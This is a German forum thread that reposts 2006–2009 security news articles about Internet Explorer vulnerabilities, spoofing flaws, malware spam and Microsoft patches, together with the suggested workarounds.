Na super..... :P -> -> -> (http://img136.imageshack.us/img136/3039/ff80x151pj0.png) (http://www.mozilla-europe.org/de/)
Titel: Hick-Hack um Lücke im Internet Explorer 7
Beitrag von: SiLæncer am 20 Oktober, 2006, 13:04
Die am gestrigen Donnerstag gemeldete erste Lücke im Internet Explorer 7, die seit etwa sechs Monaten für den IE6 bekannt ist, sorgt für einigen Hick-Hack. Erstmals äußerte sich jetzt Microsoft öffentlich dazu. Das Problem sei weder im Internet Explorer 6 noch im Internet Explorer 7 zu suchen, obwohl die Schwachstellendemonstration diese Browser als Angriffsvektor nutzt. Schuld sei vielmehr eine Outlook-Express-Komponente in Windows; man untersuche die Angelegenheit noch.
Thomas Christensen, CTO von Secunia, erklärte dazu in einer Antwort gegenüber heise Security: "Nur weil eine Schwachstelle von einer anderen Komponente stammt, entlässt das nicht den Internet Explorer oder irgendeine andere Software aus der Verantwortung, die einen direkten Angriffsvektor zu der verwundbaren Komponente öffnet."
Microsoft pflege schon seit langem eine Politik, alle möglichen Sicherheitslücken als Betriebssystemlücken einzustufen, für die aber der Internet Explorer der primäre oder einzige Angriffsvektor sei. Dies stifte Verwirrung und könnte dazu führen, dass Anwender und Administratoren die Probleme als weniger wichtig ansehen.
Während die Haltung aus Organisationssicht innerhalb von Microsoft vielleicht richtig sei, passe es nicht dazu, wie Anwender und Administratoren die Lücken wahrnehmen und wie sie sich vor dem Ausnutzen schützen. "Kurz gesagt, Secunia findet es nötig und wichtig, den Internet Explorer als anfällig einzustufen, wenn er eindeutig einen Angriffsvektor auf die anfällige Komponente liefert, die standardmäßig in einer neuen, sauberen Windowsinstallation mitgeliefert wird."
"Sich hinter einer Erklärung zu verstecken, dass bestimmte Lücken, die nur durch den Internet Explorer ausnutzbar sind, auf Outlook Express, Windows oder andere Windows-Kernkomponenten beruhen, scheint eher ein Weg zu sein, die Sicherheit des IE zu bewerben, anstatt sich hinzustellen und den Nutzern zu erklären, wo das wahre Risiko liegt, und die Verantwortung für die Lücken und Risiken im IE zu übernehmen, die dadurch zustandekommen, dass der IE so tief im System integriert mit anderen Komponenten verwoben ist."
Die WMF-Lücke, die Ende vergangenen Jahres für Wirbel sorgte, beruhte ebenfalls auf einer fehlerhaften Windows-Bibliothek. Auch hier war aber der Internet Explorer Haupteinfallstor für darauf beruhende Schädlinge.
Siehe dazu auch:
* Information on Reports of IE 7 Vulnerability, Stellungnahme in Microsofts Sicherheits-Blog * Erste Sicherheitslücke im Internet Explorer 7 [Update], Meldung auf heise Security
Quelle und Links : http://www.heise.de/security/news/meldung/79780
Titel: Schwachstelle im Internet Explorer 7 hilft Phishern
Beitrag von: SiLæncer am 25 Oktober, 2006, 12:50
Mit dem Internet Explorer 7 wollte Microsoft Anwender zukünftig besser vor Phishing-Angriffen schützen. Dies scheint nur zum Teil gelungen, wie der Sicherheitsdienstleister Secunia in der Demonstration einer Schwachstelle der jüngsten Browserversion von Microsoft zeigt. So gelingt es Secunia durch einfaches Anhängen bestimmter Zeichen an eine URL, die angezeigte Adresse in der Adressleiste eines Pop-up-Fensters zu fälschen: In der Demo zeigt die Adressleiste www.microsoft.com an, obwohl der Inhalt von Secunia stammt.
Dies ist auch deshalb besonders ernüchternd, weil Microsoft die Ausstattung jedes geöffneten Fensters und Pop-ups mit einer Adresszeile als zusätzliches Sicherheitsmerkmal des Internet Explorer 7 anpreist. Beim Internet Explorer 6 konnte eine Seite weitere Fenster öffnen, ohne das erkenntlich war, zu welcher Adresse sie gehörte. Immerhin war damit unter Umständen noch das Misstrauen des Anwenders geweckt, was beim Internet Explorer 7 nun nicht mehr unbedingt der Fall ist.
Bereits am Tage der Veröffentlichung der finalen Version des Internet Explorer 7 zeigte Secunia ein Problem im Browser auf, mit dem Angreifer Inhalte geöffneter Fenster ausspähen konnte – ein Problem das Microsoft schon sechs Monate bekannt war. Microsoft meinte dazu in einer Stellungnahme, das Problem sei weder im Internet Explorer 6 noch im Internet Explorer 7 zu suchen, obwohl die Schwachstellendemonstration diese Browser als Angriffsvektor nutze. Schuld sei vielmehr eine Outlook-Express-Komponente in Windows; man untersuche die Angelegenheit noch.
Siehe dazu auch:
* Internet Explorer 7 Popup Address Bar Spoofing Weakness, Fehlerbericht von Secunia
Quelle und Links : http://www.heise.de/security/news/meldung/80009
Titel: Neue Lücke im Internet Explorer
Beitrag von: SiLæncer am 28 Oktober, 2006, 22:38
Auf einschlägigen Webseiten ist ein Proof-of-Concept-Exploit für eine bislang unbekannte Lücke im Internet Explorer aufgetaucht. Der Exploit bringt den Browser zwar nur zum Absturz, allerdings weisen das Internet Storm Center und das US-CERT darauf hin, dass sich über den Fehler sehr wahrscheinlich auch Code in den Speicher eines Windows-PC schleusen und ausführen lässt, genauere Analysen stehen aber noch aus.
Ursache des Absturzes ist ein Fehler im ActiveX-Control ADODB, einer einheitlichen Schnittstelle zu verschiedenen Datenbanksystemen. Der Exploit erzeugt ein neues ActiveX-Objekt und führt es mehrere Male aus. Dabei kommt es offenbar zu einem Speicherproblem. Betroffen ist der Internet Explorer 6 und in einigen Fällen der Internet Explorer 7. Allerdings ließ sich das Problem beim Internet Explorer 7 in ersten Tests nicht auf unterschiedlichen Systemen reproduzieren. So zeigte sich der Internet Explorer 7 unter Vista RC2 in den Standardeinstellungen völlig unbeeindruckt von dem Exploit. Allerdings können hier auch die sicheren Voreinstellungen den Absturz verhindert haben. Auf einen Windows XP SP2 stürzte die finale Version des Internet Explorer 7 hingegen ab.
Microsoft untersucht den Fehler bereits, hat allerdings noch keine Lösung vorgeschlagen. Das US-CERT schlägt indes vor, ActiveX zu deaktivieren oder das Kill-Bit für das verwundbare Control zu setzen. Dazu muss in der Registry unter der CLSID (00000514-0000-0010-8000-00AA006D2EA4) des Controls ein Schlüssel verändert werden. Wie man Kill-Bits setzt, zeigt ein Knowledge-Base-Artikel von Microsoft: How to stop an ActiveX control from running in Internet Explorer. Unerfahrene Anwender sollten von diesem Workaround allerdings Abstand nehmen und lieber ActiveX im Internet Explorer komplett deaktivieren oder einen anderen Browser einsetzen.
Schon Ende September entwickelte sich eine zuvor als unkritisch eingestufte DoS-Lücke im WebView-ActiveX-Control im Internet Explorer zu einem Riesenloch. Auch hier half es bis zum Erscheinen eines offiziellen Patches, das Control einfach zu deaktivieren.
Siehe dazu auch:
* ADODB.Connection POC Published., Blogeintrag des Microsoft Security Response Center * ADODB.Connection ActiveX control unspecified vulnerability. Warnung des US-CERT
Quelle und Links : http://www.heise.de/security/news/meldung/80181
Titel: Rootkit dringt über ungepatchte Lücke im Internet Explorer 6 ein
Beitrag von: SiLæncer am 02 November, 2006, 13:18
Einem Bugtraq-Eintrag zufolge gibt es schon wieder eine neue Lücke im Internet Explorer 6, mit der ein Angreifer in einen Windows-Rechner einbrechen kann. Der Internet Explorer 7 soll nicht betroffen sein. Um Opfer eines Angriffs zu werden, genügt es nach Darstellung des Fehlerberichts, eine Webseite aufzurufen, die ein präpariertes JavaScript enthält. Ursache der Lücke soll ein Fehler im WScript.Shell-Objekt sein, über das sich Code in den Rechner einschleusen und mit den Rechten des angemeldeteten Anwenders starten lässt. Nähere Informationen dazu stellt der Autor des Fehlerberichtes Michal Bucko in einem PDF-Dokument bereit.
Der Hersteller von Netzwerkequipment Cisco hat ebenfalls schon eine Warnung zu der Lücke herausgegeben. Demzufolge soll Microsoft die Lücke bereits bestätigt haben. Cisco bewertet die Lücke mit einem CVSS-Score von 8 von 10 möglichen Punkten, also ziemlich kritisch. Ein Patch ist noch nicht verfügbar. Abhilfe bringt das Abschalten von JavaScript oder der Wechsel auf den Internet Explorer 7. In einem Test des öffentlichen verfügbaren Proof-of-Exploits kam der Internet Explorer aber nur zum Stillstand.
Michal Bucko gibt in seiner Beschreibung an, den Exploit auf einer Webseite gefunden zu haben. Unter anderem sei ein Testsystem mit einem Rootkit, ein weiteres mit einem Spambot infiziert worden. Die Angriffe auf Besucher dürften schon einige Zeit unbemerkt stattgefunden haben. In welchen Ausmaß, ist allerdings unklar.
Siehe dazu auch:
* Microsoft Internet Explorer WScript.Shell Object Arbitrary Code Execution Issue, Fehlerbericht von Cisco * Microsoft Internet Explorer Unspecified Code Execution Vulnerability, Fehlereintrag auf Bugtraq
Quelle und Links : http://www.heise.de/security/news/meldung/80422
Titel: Avira erkennt Internet Explorer als Trojaner
Beitrag von: SiLæncer am 06 Dezember, 2006, 11:17
Die Virenscanner des deutschen Herstellers Avira (bis Anfang des Jahres als H+BEDV bekannt) haben mit einem Update eine fehlerhafte Signatur eingespielt, die den Internet Explorer 6 als Trojaner TR.Spy.Goldun.ML erkennen. Einige verunsicherte Anwender haben aufgrund der Virenfund-Meldung ihren Internet Explorer gelöscht, um den vermeintlichen Trojaner wieder loszuwerden.
Laut Helmut Büsker von Avira ist in den Signaturdateien 6.36.01.127 beziehungsweise 6.36.01.134 bei den inkrementellen Updates die falsche Signatur trotz der internen Tests durchgerutscht. Sie wurden ab 7:25 Uhr am heutigen Mittwochmorgen verteilt. Der Fehler sei jedoch schnell aufgefallen und wurde eine halbe Stunde später mit neuen Signaturdatenbanken behoben. Betroffene Anwender könnten die Datei gegebenfalls aus der Quarantäne wiederherstellen. Die Windows File Protection sorge jedoch selbständig für das Rückspielen der fehlenden Datei. Nach Einschätzung von Avira sei aufgrund der Windows File Protection kein größerer Schaden entstanden.
Hat man jedoch die Original- und Backup-Datei des Internet Explorer gelöscht, ist der Microsoft-Webbrowser so nicht mehr zu retten. Hier hilft etwa eine Rettungsinstallation von der Installations-CD des Betriebssystems.
Fälschlich als Schädling klassifizierte harmlose Dateien, sogenannte False-Positives, sind bei Virenscannern nicht unüblich. Mit ihnen hat jedes Antivirenprodukt gelegentlich zu kämpfen. Durch regelmäßige Backups der wichtigen Daten und der Systempartition kann man sich jedoch gegen versehentliche Systemzerstörung durch fehlerhafte Signaturen oder Schadsoftware wappnen.
Quelle : www.heise.de
Titel: Internet Explorer 7: Phishing-Filter bremst Rechner aus
Beitrag von: SiLæncer am 17 Dezember, 2006, 13:38
Der im Internet Explorer 7 integrierte Phishing-Filter bremst beim Besuch einiger Websites den PC durch stark ansteigende CPU-Last aus. Das Tool soll Nutzer automatisch vor Websites schützen, die unter Vorspiegelung einer anderen Identität persönliche Zugangsdaten erschleichen wollen. Enthält eine Website zahlreiche Frames oder springt man in kurzer Zeit viele Seiten parallel an, kann die im Hintergrund stattfindende Überprüfung die Leistungsfähigkeit des PCs offensichtlich stark beeinträchtigen.
Microsoft hat vor einigen Tagen zwar ein Update bereitgestellt, es wird jedoch nicht automatisch über die Sicherheits-Updates eingespielt. Wenn die oben beschriebenen Probleme auftreten, sollte man es von der Microsoft-Homepage herunterladen und manuell einspielen.
Quelle : www.heise.de
Titel: Neue Phishing-Lücke im Internet Explorer 7
Beitrag von: SiLæncer am 23 Februar, 2007, 13:36
Michal Zalewski hat eine Schwachstelle im Internet Explorer 7 entdeckt, die Phishern die Arbeit erleichtert und sogar die üblichen Ratschläge ad absurdum führt, URLs immer manuell einzugeben. Schon kurz nach Verfügbarkeit des Internet Explorer 7 im Oktober 2006 wurde ein Fehler bekannt, mit dem sich die Adressleiste von Fenstern falsch anzeigen ließ.
Die Ursache der neuen Schwachstelle liegt unter anderem in der Verarbeitung so genannter onunload-Ereignisse durch JavaScript. Damit kann eine Seite beispielsweise das Laden einer neuen Seite verhindern, in der Adresszeile erscheint aber dennoch die URL der neuen Seite – sofern man die Adresse manuell eingibt. Ein Anwender könnte denken, er wäre auf der richtigen Seite. Zalewski hat eine Demo zur Verfügung gestellt, in der man den Fehler testen kann.
Zwar muss ein Opfer für einen erfolgreichen Angriff immer noch ein bösartige Seite besuchen, anschließend kann es den Aufrufen weiterer Seiten aber nicht mehr unbedingt trauen. Ruft man eine Seite hingegen per Bookmark auf, so sieht man weiterhin die Adresse der manipulierten Seite.
Secunia will die Lücke schon am 5. Januar entdeckt und Microsoft gemeldet haben. Eigentlich wollte man mit der Veröffentlichung eines eigenen Fehlerberichtes bis zu einer abschließenden Beurteilung durch Microsoft warten. Aufgrund Zalewkis Meldung gebe man Informationen nun doch schon heraus. Betroffen ist der Internet Explorer 7 und Windows XP und Vista.
Firefox ist von diesem Problem zwar nicht betroffen, während seiner Tests fand Zalewski aber einen anderen Fehler im Browser der Mozilla-Foundation bei der Verarbeitung von onunload-Events, der zum Absturz führt. Eine Demo zeigt das Problem. Aufgrund der Art des Fehlers schließt Zalewski nicht aus, dass sich darüber auch Code einschleusen und ausführen lässt. Sowohl beim Firefox als auch beim Internet Explorer hilft vorerst nur das Abschalten von JavaScript, um sich zu schützen
Siehe dazu auch:
* MSIE7 browser entrapment vulnerability (probably Firefox, too), Fehlerbericht von Michal Zalewski * Internet Explorer 7 "onunload" Event Spoofing Vulnerability, Fehlerbericht von Secunia * Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr), Fehlerbericht von Michal Zalewski
Quelle und Links : http://www.heise.de/security/news/meldung/85763
Titel: Phishing-Schwachstelle im Internet Explorer 7
Beitrag von: SiLæncer am 15 März, 2007, 12:44
Eine Kombination zweier Schwachstellen im Internet Explorer 7 vereinfacht einmal mehr Phishern die Arbeit. Der israelische Sicherheitsspezialist Aviv Raff hat dazu eine Online-Demo zur Verfügung gestellt, die sich die Eigenart des Browser zu nutze macht, einen Fehler beim Abbruch der Navigation zu melden ("Die Navigation zu der Webseite wurde abgebrochen"). Mit einem präparierten Link ist es möglich, JavaScript in diese lokal vordefinierte Fehlerseite (navcancl.htm) einzuschleusen und so eigene Inhalte anzuzeigen.
Das allein ist nicht allzu dramatisch; durch einen Designfehler zeigt der Internet Explorer 7 dabei in der Adresszeile aber nur die URL der ursprünglich aufgerufenen Seite an, obwohl der dargestellte Inhalt nicht von dort stammt. Ein Anwender könnte sich also über die Herkunft des Inhalts der Seite täuschen lassen. Allerdings wird der gefälschte Inhalt der Seite erst eingeblendet, wenn das Opfer in der Fehlerseite den Link "Aktualisieren Sie die Seite" anklickt. Erfahrungsgemäß klicken viele Anwender aber eher auf den Refresh-Button in der Navigationsleiste, so dass der Fehler in solchen Fällen nicht zum Tragen kommt.
US-Medienberichten zufolge untersucht Microsoft das Problem. Betroffen sind der Internet Explorer 7 unter Vista und XP. Bis zu einer Lösung des Problems empfiehlt Aviv, nicht dem Aktualisierungslink in Fehlermeldungen zu folgen. Ein Wechsel auf andere Browser bringt kaum Abhilfe. Erst vor wenigen Tagen hatte Michal Zalewski eine Spoofing-Lücke in Firefox vorgeführt. Einzig für Opera sind derzeit keine Phishing-Lücken bekannt. Der Schein kann allerdings trügen. Aufgrund der eher geringen Marktanteile beschäftigen sich derzeit wenige Sicherheitsspezialisten mit dem Browser aus Norwegen.
Siehe dazu auch:
* Phishing using IE7 local resource vulnerability, Fehlerbericht von Raff Aviv -> http://aviv.raffon.net/2007/03/14/PhishingUsingIE7LocalResourceVulnerability.aspx
Quelle : www.heise.de
Titel: Internet Explorer lässt sich präparierte Proxy-Daten unterschieben
Beitrag von: SiLæncer am 26 März, 2007, 16:45
Microsoft hat in seiner Knowledgebase einen Workaround für eine auf der Hacker-Konferenz ShmooCon diskutierte Sicherheitslücke veröffentlicht. Sofern der Internet Explorer für die automatische Suche nach einem Webproxy konfiguriert ist, lässt er sich unter Umständen Konfigurationsdaten eines Angreifers unterschieben. Der Angreifer kann dann über einen von ihm kontrollierten Server mittels des Web Proxy Autodiscovery Protocol (WPAD) eine präparierte Konfigurationsdatei (Wpad.dat) ausliefern, sodass die Proxyeinstellungen des Browsers auf einen ebenfalls vom Angreifer kontrollierten Proxy zeigen. Der Browser benutzt in der Folge den Rechner des Angreifers als Proxy.
Damit ließe sich beispielsweise der HTTP-Verkehr des Opfers mitlesen. Um die falschen Daten ausliefern zu können, muss der Angreifer seinen WPAD-Server zuvor allerdings im DNS oder WINS registrieren. Anders als noch bei der WPAD-Schwachstelle im Internet Explorer 5 lässt sich der Fehler aber nicht über das Internet ausnutzen, der Angriff soll auf das lokale Netz begrenzt sein.
Sofern im DNS und WINS noch keine WPAD-Einträge vorhanden sind oder die Proxy-Einstellungen per DHCP nicht richtig übertragen werden, empfiehlt Microsoft, statische Einträge anzulegen, damit ein Angreifer keine eigenen Einträge mehr hinzufügen kann.
Gerade im LAN gibt es neben der Manipulation eines Proxys aber noch weitere Möglichkeiten, um Daten von Anwendern mitzulesen. So lassen sich mittels ARP-Spoofing auch in geswitchten Netzerwerken Verbindungen umlenken. Weitere Infos dazu liefert der Hintergrundartikel "Angriff von innen" auf heise Security.
Siehe dazu auch:
* How to configure Microsoft DNS and WINS to reserve WPAD registration, Workaround von Microsoft -> http://support.microsoft.com/kb/934864
Quelle : www.heise.de
Titel: Exploit-Code für Internet Explorer veröffentlicht
Beitrag von: SiLæncer am 27 März, 2007, 17:10
Für eine Sicherheitslücke im Windows, die Microsoft bereits mit einem Sicherheits-Update bedacht hat, ist neuer Exploit-Code veröffentlicht worden. Damit erhöht sich die Wahrscheinlichkeit für Versuche, diesen Fehler über den Internet Explorer auszunutzen.
Bereits im Juli 2006 veröffentlichte der Sicherheitsforscher H.D Moore im Rahmen seines Monats der Browser Bugs seine Erkenntnisse über eine Schwachstelle in den Microsoft Data Access Components (MDAC) sowie Beispiel-Code, wie diese Anfälligkeit über den Internet Explorer (IE) ausgenutzt werden kann. Nun ist eine aggressivere Variante eines Exploits dieser Schwachstelle aufgetaucht, wie das Sicherheitsunternehmen Websense berichtet .
Im Februar 2007, kaum ein halbes Jahr nach H.D. Moores Veröffentlichung, hat Microsoft in Rahmen des Patch Day das Security Bulletin MS07-009 bereit gestellt, dessen zugehörige Sicherheits-Updates diese Schwachstelle beseitigen sollen. Da etliche Windows-Anwender die automatische Installation von Windows-Updates ausgeschaltet haben, gibt es immer noch eine Vielzahl von Windows-Rechnern, die mit anfälligen Versionen des Internet Explorers zum Surfen im Web benutzt werden.
Websense gibt an, man suche derzeit aktiv nach Websites, die diesen Exploit-Code einsetzen, um schädliche Programme wie Adware, Spyware oder Trojanische Pferde einzuschleusen. Diese Art von Sicherheitslücken habe sich in der Vergangenheit stets als bei Malware-Autoren recht beliebt erwiesen und man erwarte eine zunehmende Nutzung dieser Anfälligkeit in naher Zukunft.
Für Windows-Anwender heißt das, sie sollten das mutmaßlich schmale verbleibende Zeitfenster nutzen und die noch nicht installierten Sicherheits-Updates einspielen. Wenn Sie einen anderen Browser einsetzen, der keine ActiveX-Unterstützung enthält, etwa Firefox oder Opera, ist das Risiko Opfer dieser Sicherheitslücke zu werden eher gering. Vorsicht ist allerdings auch bei Erweiterungen wie "IE Tab" geboten, die in Firefox eine Anzeige mittels IE-Komponenten ermöglicht.
Quelle : www.pcwelt.de
Titel: Malware: Falscher Internet Explorer 7
Beitrag von: SiLæncer am 08 Mai, 2007, 15:57
Eine neue Welle von Spam-artigen Mails verbreitet Links zum vorgeblichen Download des Internet Explorer 7. Hinter dem IE-Logo steckt jedoch ein Downloader für Trojanische Pferde.
In Spam-artig verschickten Mails mit der gefälschten Absenderangabe "admin@microsoft.com" und dem Betreff "Internet Explorer 7.0" werden seit dem Wochenende wieder vermehrt vorgebliche Download-Links für den IE 7 verbreitet. Die meisten der Download-Adressen funktionieren bereits nicht mehr, werden jedoch offenbar in den neu verschickten Mails ständig durch neue ersetzt. Zuletzt gab es Ende März eine gleichartige Welle mit Malware-Spam .
Wie das Internet Storm Center berichtet , enthalten die Mails eine Menge meist nicht sichtbaren Textmüll, der von irgend welchen Web-Seiten kopiert worden ist. Angezeigt wird lediglich ein Logo aus der Zeit der Beta 2 des Internet Explorer 7, das mit einem Link hinterlegt ist.
Wird die herunter geladene "update.exe" (4 KB) ausgeführt, nimmt sie Kontakt zu einem Server in Malaysia auf und lädt weitere Malware-Dateien herunter. Dabei handelt es sich um Trojanische Pferde, die den befallenen Rechner zu einem Teil eines Botnets machen sowie persönliche Daten ausspionieren sollen.
Die in den Mails verlinkte EXE-Datei ist übers Wochenende durch eine modifizierte Version gleicher Größe ersetzt worden, wird jedoch trotzdem von den meisten Virenscannern erkannt.
Quelle : www.pcwelt.de
Titel: Internet Explorer verrät FTP-Zugangsdaten
Beitrag von: SiLæncer am 14 August, 2007, 12:26
Anwender des Internet Explorer sollten beim Herunterladen von HTML-Seiten von FTP-Servern darauf achten, ob möglicherweise die eigenen FTP-Zugangsdaten im Dokument gespeichert sind, bevor sie es weitergeben oder nochmals veröffentlichen. Der Internet Explorer 6 und 7 hat die Eigenart, die Herkunfts-URL eines HTML-Dokumentes als Kommentar hinzuzufügen, wenn man es lokal abspeichert. Ruft man einen FTP-Server auf, der eine Authentifizierung erfordert, so findet man im Dokument nach dem Speichern neben der URL allerdings auch noch Namen und Passwort im Klartext in der Form:
<!-- saved from url=(0042)ftp://name:password@adresse/test.html -->
Insbesondere beim Gestalten der eigenen Webseite kann es leicht passieren, dass man so seine FTP-Zugangsdaten verrät, wenn man das überarbeitete Dokument wieder auf den FTP-Server hochlädt. Erstmals erwähnt hat das Problem Brain Krebs von der Washington Post in seinem Security Blog. Auf Nachfrage bei Microsoft erhielt er die Antwort, dass der Internet Explorer nicht als vollwertiger FTP-Client gedacht sei. Der Grund warum die URL im Dokument gespeichert werde, sei die Zuordnung zu einer Sicherheitszone, falls das Dokument zu einem späteren Zeitpunkt nochmals lokal geöffnet werde. Name und Passwort würden deshalb auftauchen, da sie Bestandteil einer gültigen URL seien.
Um dem Problem aus dem Weg zu gehen, sollten Anwender ein dedizierten FTP-Client einsetzen. Unter Umständen können sogar Webentwickler über den "saved from"-Kommentar auch Plagiate ihrer Webseiten per Google finden, sofern der Kopierer den Kommentar übersehen hat.
Quelle : www.heise.de
Titel: Zero-Day-Exploit für Internet Explorer breitet sich aus
Beitrag von: SiLæncer am 14 Dezember, 2008, 11:04
Nach Beobachtungen von Sicherheitsfirmen breitet sich der Zero-Day-Exploit für den Internet Explorer rapide im Netz aus. Er richtet sich gegen eine besonders gefährliche Lücke in allen Versionen des des Microsoft-Browsers, für die es bislang keinen Patch gibt: Allein durch Öffnen einer Internetseite kann der Windows-PC mit Schadsoftware infiziert werden. Anders als bei den meisten anderen Angriffen ist also kein weiterer unvorsichtiger Klick des Surfers erforderlich.
Immer mehr harmlose Server werden derzeit durch SQL-Injection so manipuliert, dass sie den Zero-Day-Exploit an anfragende Rechner ausliefern. Daher kann man sich unter Umständen auch auf Webseiten vertrauenswürdiger Anbieter infizieren.
Antiviren-Software schützt nur begrenzt vor Web-Seiten, die einen solchen Exploit nutzen, um Rechner mit Schadsoftware zu infizieren. Zum Einen überwachen längst nicht alle Virenwächter den Internet-Verkehr; viele beschränken sich darauf, Dateien zu durchsuchen. Aber wenn eine Web-Seite im Browser-Cache landet, ist es meist schon zu spät und der böse Code läuft bereits. Zum Anderen haben noch längst nicht alle Hersteller passende Signaturen erstellt. Einen echten Exploit, der heise Security am Dienstag erreichte, erkannten am heutigen Samstag unter anderem CA, Kaspersky, Trend Micro, NOD32, Panda und F-Secure noch nicht.
Microsoft gibt eine ausführliche Liste von Workarounds, wie der Internet Explorer zu konfigurieren ist, um den Exploit ins Leere laufen zu lassen. Dazu gehört unter anderem der wenig praxistaugliche Tipp, Scripting zu deaktivieren, ohne das es auf eine Reihe von Webseiten zu Problemen bei der Darstellung und Bedienung kommen kann.
Solange Microsoft noch keinen Patch bereitstellt, sollte man zu einem alternativen Browser greifen, der die verwundbaren Microsoft-Bibliotheken nicht benutzt. Populäre Beispiele sind Firefox, Opera oder Safari.
Siehe dazu auch:
* Auch Internet Explorer 6 und 8 von Zero-Day-Lücke betroffen, Bericht auf heise Security * Zero-Day-Lücke im Internet Explorer 7 wird vermutlich seit Oktober ausgenutzt, Bericht auf heise Security * Acht Update-Pakete und zwei Zero-Day-Exploits zum Microsoft-Patchday, Bericht auf heise Security
Quelle : http://www.heise.de/newsticker/Zero-Day-Exploit-fuer-Internet-Explorer-breitet-sich-aus--/meldung/120388
Titel: Extra-Patch für Internet Explorer
Beitrag von: SiLæncer am 16 Dezember, 2008, 22:46
Microsoft kündigt für morgen, Dienstag den 17.12. einen Patch für das kritische Sicherheitsloch im Internet Explorer an. Der Ankündigung lässt sich zwar keine Uhrzeit für die Veröffentlichung entnehmen, doch nachdem es in Redmond 9 Stunden früher ist als hier, dürfte kaum vor dem Abend damit zu rechnen sein.
Es ist nicht das erste Mal, dass Micrsosoft einen Patch außerhalb der durch den monatlichen Patchday vorgegebenen Reihe veröffentlicht. Bereits im Oktober musste Microsoft kurzfristig eine kritische Lücke im RPC-Dienst ausbessern, die aktiv von Würmern ausgenutzt wurde.
Auch bei dem Sicherheitsloch im Internet Explorer handelt es sich um ein kritisches Problem, das aktiv ausgenutzt wird. Die Lücke wurde vor genau einer Woche, parallel zum Dezember-Patchday bekannt. Bis dahin beschränkten sich die Attacken damit hauptsächlich auf den chinesischen Raum. Mittlerweile werden offenbar immer mehr Webserver gezielt durch SQL Injection kompromittiert, um über den Exploit die Rechner ihrer Besucher zu infizieren. Somit sah sich Microsoft wohl gezwungen, schnellst möglich zu handeln.
Ob auch für die beiden anderen akuten Sicherheitsprobleme noch dieses Jahr Patches erscheinen, lässt sich der Ankündigung ebenfalls nicht entnehmen. Eine Lücke in Wordpad wird nach Microsofts eigenen Angaben ebenfalls bereits ausgenutzt und Microsofts SQL-Server weist offenbar ebenfalls ein noch ungepatchtes Problem auf.
Siehe dazu auch:
* Zero-Day-Exploit für Internet Explorer breitet sich aus, auf heise Security * Auch Internet Explorer 6 und 8 von Zero-Day-Lücke betroffen, Bericht auf heise Security * Zero-Day-Lücke im Internet Explorer 7 wird vermutlich seit Oktober ausgenutzt, Bericht auf heise Security * Acht Update-Pakete und zwei Zero-Day-Exploits zum Microsoft-Patchday, Bericht auf heise Security
Quelle : http://www.heise.de/newsticker/Extra-Patch-fuer-Internet-Explorer--/meldung/120552
Titel: Microsoft will kritische Lücken im Internet Explorer und Exchange Server schließ
Beitrag von: SiLæncer am 06 Februar, 2009, 09:41
Microsoft plant vier Sicherheits-Updates am kommenden Dienstag, den 10. Februar, zu veröffentlichen. Sie sollen Lücken im Internet Explorer 7, SQL Server 2000 und 2005, Exchange Server 2000, 2005 und 2007 sowie Visio 2002, 2003 und 2007 schließen. Die Fehler im Internet Explorer und dem Exchange Server stufen die Redmonder als kritisch ein, da sich dadurch aus der Ferne Code einschleusen und starten lassen soll.
Darüber hinaus aktualisiert Microsoft das Malicious Software Removal Tool und die Filterregel für den Spam-Filter von Vista Mail. Ein Update soll zudem die Killbits für mehrere ActiveX-Controls setzen, um deren Missbrauch durch manipulierte Webseiten zu verhindern. Zudem gibt es nicht sicherheitsrelevante Updates für das Media Center und das Media Center TVPack unter Vista.
Quelle : http://www.heise.de/newsticker/Microsoft-will-kritische-Luecken-im-Internet-Explorer-und-Exchange-Server-schliessen--/meldung/126979
Titel: Microsofts Februar-Patchday mit vier Updates
Beitrag von: SiLæncer am 10 Februar, 2009, 21:12
In jeweils zwei kritischen und zwei wichtigen Sicherheitsnotizen beschreibt Microsoft Lücken in Internet Explorer, Exchange, SQL Server und Visio aus MS-Office.
Dem Internet Explorer spendiert Microsoft ein Sammelupdate, das gleich zwei kritische Lücken des Microsoft-Browsers beheben soll. Beide betreffen Fehler in der Speicherverwaltung, die sich laut Hersteller recht leicht ausnutzen lassen, um Code einzuschleusen und mit den Rechten des angemeldeten Benutzers auszuführen (MS09-002).
Auch der Mail- und Groupware-Server Exchange weist zwei Lücken auf, von denen allerdings nur die beim Bearbeiten von Daten im Transport Neutral Encapsulation Format (TNEF) als kritisch eingestuft ist. Der Fehler beim Auswerten spezieller MAPI-Befehle bewirkt lediglich, dass der Exchange Server nicht mehr erreichbar ist (MS09-003).
Die bereits im Dezember bekannt gewordene Sicherheitslücke in Microsofts SQL Server erachtet man nur als wichtig, obwohl sie ebenfalls das Einschleusen und Ausführen von Code ermöglicht. Allerdings muss sich der Angreifer dazu entweder an der Datenbank anmelden können oder Befehle über eine SQL-Injection-Lücke einschleusen. Microsoft wurde bereits im April 2008 über dieses Problem informiert (MS09-004).
Gleich drei Fehler in der Speicherverwaltung der Office-Komponente Visio bügelt das vierte Update aus. Dass es Microsoft lediglich als wichtig einstuft, ist der Tatsache geschuldet, dass der Anwender Visio-Dokumente von Hand öffnen muss (MS09-005).
Zumindest die Internet-Explorer-Lücken sind sehr gefährlich und werden vermutlich bald ausgenutzt, um Rechner beim Besuch von Webseiten zu infizieren. Das Update sollte somit höchste Priorität erhalten. Aber da auch die anderen Lücken das Einschleusen von Code ermöglichen, sollte man auch das Einspielen der anderen Updates nicht unnötig hinauszögern.
* Microsoft Security Bulletin Summary für Februar 2009 (http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms09-feb.mspx), Übersicht von Microsoft
Quelle : www.heise.de
Titel: Internet Explorer führt Code in Bildern aus
Beitrag von: SiLæncer am 11 Februar, 2009, 12:51
Wenn man ein Bild im Internet Explorer öffnet, kann es gut sein, dass dieser zu der Auffassung gelangt, dass es sich dabei eigentlich um HTML-Code handelt und sogar eingebettete Scripte ausführt. Gefährdet sind vor allem die Besucher von Web-Seiten, bei denen Benutzer selbst Bilder hochladen können.
